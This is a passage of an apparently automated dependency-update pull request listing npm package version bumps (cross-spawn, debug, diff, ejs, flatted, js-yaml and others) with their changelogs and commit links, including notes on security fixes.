href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.5...v7.0.6\"\u003e7.0.6\u003c/a\u003e (2024-11-18)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate cross-spawn version to 7.0.5 in package-lock.json (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003ef700743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.4...v7.0.5\"\u003e7.0.5\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix escaping bug introduced by backtracking (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e640d391\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.4\"\u003e7.0.4\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e5ff3a07\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/77cd97f3ca7b62c904a63a698fc4a79bf41977d0\"\u003e\u003ccode\u003e77cd97f\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/6717de49ff1e5de49622488dcb9c33fb25370c85\"\u003e\u003ccode\u003e6717de4\u003c/code\u003e\u003c/a\u003e chore: upgrade standard-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003e\u003ccode\u003ef700743\u003c/code\u003e\u003c/a\u003e fix: update cross-spawn version to 7.0.5 in package-lock.json\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9a7e3b2165917367f74b8365faad9873b30d7263\"\u003e\u003ccode\u003e9a7e3b2\u003c/code\u003e\u003c/a\u003e chore: fix build status badge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/085268352dcbcad8064c64c5efb25268b4023184\"\u003e\u003ccode\u003e0852683\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e\u003ccode\u003e640d391\u003c/code\u003e\u003c/a\u003e fix: fix escaping bug introduced by backtracking\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/bff0c87c8b627c4e6d04ec2449e733048bebb464\"\u003e\u003ccode\u003ebff0c87\u003c/code\u003e\u003c/a\u003e chore: remove codecov\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/a7c6abc6fee79641d45b452fe6217deaa1bd0973\"\u003e\u003ccode\u003ea7c6abc\u003c/code\u003e\u003c/a\u003e chore: replace travis with github workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9b9246e0969e86656d7ccd527716bc3c18842a19\"\u003e\u003ccode\u003e9b9246e\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e\u003ccode\u003e5ff3a07\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `debug` from 4.2.0 to 4.3.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/debug-js/debug/releases\"\u003edebug's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.3.1\u003c/h2\u003e\n\u003ch1\u003ePatch release 4.3.1\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixes a ReDOS regression (\u003ca href=\"https://redirect.github.com/debug-js/debug/issues/458\"\u003e#458\u003c/a\u003e) - see \u003ca href=\"https://redirect.github.com/debug-js/debug/issues/797\"\u003e#797\u003c/a\u003e for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.3.0\u003c/h2\u003e\n\u003ch1\u003eMinor release\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDeprecated \u003ccode\u003edebugInstance.destroy()\u003c/code\u003e\u003c/strong\u003e. Future major versions will not have this method; please remove it from your codebases as it currently does nothing.\u003c/li\u003e\n\u003cli\u003eFixed quoted percent sign\u003c/li\u003e\n\u003cli\u003eFixed memory leak within debug instances that are created dynamically\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/0d3d66b0eb47c5d34e1a940e8a204446fdd832cd\"\u003e\u003ccode\u003e0d3d66b\u003c/code\u003e\u003c/a\u003e 4.3.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/b6d12fdbc63b483e5c969da33ea6adc09946b5ac\"\u003e\u003ccode\u003eb6d12fd\u003c/code\u003e\u003c/a\u003e fix regression\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/3f56313c1e4a0d59c1054fb9b10026b6903bfba7\"\u003e\u003ccode\u003e3f56313\u003c/code\u003e\u003c/a\u003e 4.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/e2d3bc9e428bdd45adb8d6e7f8ab543bee54d9a6\"\u003e\u003ccode\u003ee2d3bc9\u003c/code\u003e\u003c/a\u003e add deprecation notice for debug.destroy()\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/72e7f864bd75fc8353e4dd450de96d9104ba9f35\"\u003e\u003ccode\u003e72e7f86\u003c/code\u003e\u003c/a\u003e fix memory leak within debug instance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/27152cad248df54217a14c072e7be1cd16da5f6d\"\u003e\u003ccode\u003e27152ca\u003c/code\u003e\u003c/a\u003e add test for enable/disable of existing instances\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/debug-js/debug/commit/22e13fe07e21f32888201aa40833599fd10a4fbb\"\u003e\u003ccode\u003e22e13fe\u003c/code\u003e\u003c/a\u003e fix quoted percent sign\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/debug-js/debug/compare/4.2.0...4.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~qix\"\u003eqix\u003c/a\u003e, a new releaser for debug since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `diff` from 4.0.2 to 5.0.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kpdecker/jsdiff/blob/master/release-notes.md\"\u003ediff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.2 - January 2026\u003c/h2\u003e\n\u003cp\u003eOnly change from 5.2.0 is a backport of the fix to \u003ca href=\"https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\"\u003ehttps://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003ev5.2.1 (deprecated)\u003c/h2\u003e\n\u003cp\u003eAccidental release - do not use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b7b6339dea15baa636bebe7092ec1cbabf001dea\"\u003e\u003ccode\u003eb7b6339\u003c/code\u003e\u003c/a\u003e v5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b5377abefc55cd424e82308515cfbdc4d53ad8a1\"\u003e\u003ccode\u003eb5377ab\u003c/code\u003e\u003c/a\u003e Update package version to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/78017899c4c80d51db805b6e013079cadc6ed0ae\"\u003e\u003ccode\u003e7801789\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/649\"\u003ekpdecker/jsdiff#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/042a8372f331ffd3d81b1e4b799409c7d944e6fd\"\u003e\u003ccode\u003e042a837\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/647\"\u003ekpdecker/jsdiff#647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kpdecker/jsdiff/compare/v5.2.0...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ejs` from 3.1.6 to 5.0.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/releases\"\u003eejs's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.0.2\u003c/h2\u003e\n\u003cp\u003eVersion 5.0.2\u003c/p\u003e\n\u003ch2\u003ev5.0.1\u003c/h2\u003e\n\u003cp\u003eVersion 5.0.1\u003c/p\u003e\n\u003ch2\u003ev4.0.1\u003c/h2\u003e\n\u003cp\u003eVersion 4.0.1\u003c/p\u003e\n\u003ch2\u003ev3.1.10\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.10\u003c/p\u003e\n\u003ch2\u003ev3.1.9\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.9\u003c/p\u003e\n\u003ch2\u003ev3.1.8\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.8\u003c/p\u003e\n\u003ch2\u003ev3.1.7\u003c/h2\u003e\n\u003cp\u003eVersion 3.1.7\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mde/ejs/blob/main/RELEASE_NOTES_v5.md\"\u003eejs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eEJS Version 5.0.1 Release Notes\u003c/h1\u003e\n\u003ch2\u003eOverview\u003c/h2\u003e\n\u003cp\u003eEJS version 5.0.1 is a major release that removes deprecated options, fixes template\nbehavior with custom delimiters, improves the CLI and build pipeline, and simplifies\nthe package by moving Jake to a dev-only dependency.\u003c/p\u003e\n\u003ch2\u003eMajor Changes\u003c/h2\u003e\n\u003ch3\u003eDeprecated Option Removed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRemoved \u003ccode\u003eclient\u003c/code\u003e option\u003c/strong\u003e (Fixes \u003ca href=\"https://redirect.github.com/mde/ejs/issues/746\"\u003e#746\u003c/a\u003e): The legacy \u003ccode\u003eclient\u003c/code\u003e flag and related\ncode have been removed. This option produced browser-oriented template functions\nby inlining escape and rethrow helpers; it was unmaintained and broken. Use the\nstandard browser bundle (\u003ccode\u003eejs.min.js\u003c/code\u003e) or compile templates for the client using\nyour own build setup.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCustom delimiters and whitespace-slurp tags\u003c/strong\u003e (Fixed \u003ca href=\"https://redirect.github.com/mde/ejs/issues/780\"\u003e#780\u003c/a\u003e): Whitespace-slurp\ntags (\u003ccode\u003e\u0026lt;%_\u003c/code\u003e and \u003ccode\u003e_%\u0026gt;\u003c/code\u003e by default) now respect custom \u003ccode\u003eopenDelimiter\u003c/code\u003e, \u003ccode\u003edelimiter\u003c/code\u003e,\nand \u003ccode\u003ecloseDelimiter\u003c/code\u003e. Previously, the slurp regex was hardcoded to \u003ccode\u003e\u0026lt;%\u003c/code\u003e/\u003ccode\u003e%\u0026gt;\u003c/code\u003e,\nso custom delimiters did not work correctly with \u003ccode\u003e\u0026lt;%_\u003c/code\u003e/\u003ccode\u003e_%\u0026gt;\u003c/code\u003e-style tags.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCLI \u0026amp; Build\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eCLI no longer depends on Jake\u003c/strong\u003e: The \u003ccode\u003eejs\u003c/code\u003e CLI now uses a bundled argument\nparser (\u003ccode\u003elib/esm/parseargs.js\u003c/code\u003e / \u003ccode\u003elib/cjs/parseargs.js\u003c/code\u003e) instead of the Jake\nprogram module. Jake remains a devDependency for the build (lint, compile,\nbrowserify, minify, test).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eJake moved to devDependencies\u003c/strong\u003e: Jake was moved from \u003ccode\u003edependencies\u003c/code\u003e to\n\u003ccode\u003edevDependencies\u003c/code\u003e, so installing \u003ccode\u003eejs\u003c/code\u003e as a dependency no longer pulls in Jake.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMinification fix\u003c/strong\u003e: The minify task now minifies the browserified \u003ccode\u003eejs.js\u003c/code\u003e\nbundle (output of the browserify task) instead of \u003ccode\u003elib/cjs/ejs.js\u003c/code\u003e, so the\nbrowser bundle is correctly minified.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation \u0026amp; Examples\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eJSDoc updates\u003c/strong\u003e: Removed references to the \u003ccode\u003eclient\u003c/code\u003e option and \u003ccode\u003eClientFunction\u003c/code\u003e\nfrom options and template-function documentation.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExamples\u003c/strong\u003e: \u003ccode\u003eexamples/client-compilation.html\u003c/code\u003e and \u003ccode\u003eexamples/express/app.js\u003c/code\u003e\nupdated to remove use of the \u003ccode\u003eclient\u003c/code\u003e option; Express example no longer passes\n\u003ccode\u003eclient: true\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eREADME\u003c/strong\u003e: Removed broken link to the third-party EJS playground.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCode Quality\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eTests\u003c/strong\u003e: Removed tests that targeted the removed \u003ccode\u003eclient\u003c/code\u003e option behavior.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eUtils\u003c/strong\u003e: Removed unused \u003ccode\u003eclient\u003c/code\u003e-related code from \u003ccode\u003elib/esm/utils.js\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBreaking Changes\u003c/h2\u003e\n\u003ch3\u003eRemoved \u003ccode\u003eclient\u003c/code\u003e Option\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eOption removed\u003c/strong\u003e: The \u003ccode\u003eclient\u003c/code\u003e option is no longer supported. Passing\n\u003ccode\u003eclient: true\u003c/code\u003e (or any value) is ignored; no error is thrown, but no\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/a464c96302e57a53914604617331b69afccae25e\"\u003e\u003ccode\u003ea464c96\u003c/code\u003e\u003c/a\u003e Version 5.0.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/b4f7b4936452a6e28eafa7a1404fda16a818802d\"\u003e\u003ccode\u003eb4f7b49\u003c/code\u003e\u003c/a\u003e Hardening\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/2b155621f9b9ee0bcc59b6c877db69ab6f2fbc50\"\u003e\u003ccode\u003e2b15562\u003c/code\u003e\u003c/a\u003e Added release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/f9ab0b7d9437de643f1c63896271307708810a77\"\u003e\u003ccode\u003ef9ab0b7\u003c/code\u003e\u003c/a\u003e Version 5.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/173c46f4786f1d143cc51934b4696f0795079b2c\"\u003e\u003ccode\u003e173c46f\u003c/code\u003e\u003c/a\u003e Bump version for release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/35ad41b93e8b2ddd579e764d043057957d1a9866\"\u003e\u003ccode\u003e35ad41b\u003c/code\u003e\u003c/a\u003e Removed Jake\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/bf142d1abc5fdd76fc498db97f613806cd80fb47\"\u003e\u003ccode\u003ebf142d1\u003c/code\u003e\u003c/a\u003e Updated version number\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/3cd835cfdaf327e4549bf9139e8613244ac5a929\"\u003e\u003ccode\u003e3cd835c\u003c/code\u003e\u003c/a\u003e Remove broken playground link\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/6e1289c3344e8b3aeb4f7ecd8ae70c36be8664df\"\u003e\u003ccode\u003e6e1289c\u003c/code\u003e\u003c/a\u003e Fix minification\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/5090873fbff032d61968a32232346fafa65b06d2\"\u003e\u003ccode\u003e5090873\u003c/code\u003e\u003c/a\u003e Fixes \u003ca href=\"https://redirect.github.com/mde/ejs/issues/746\"\u003e#746\u003c/a\u003e, removed old 'client' flag\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mde/ejs/compare/v3.1.6...v5.0.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 2.0.2 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v2.0.2...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `http-cache-semantics` from 4.1.0 to 4.2.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kornelski/http-cache-semantics/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.0 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is 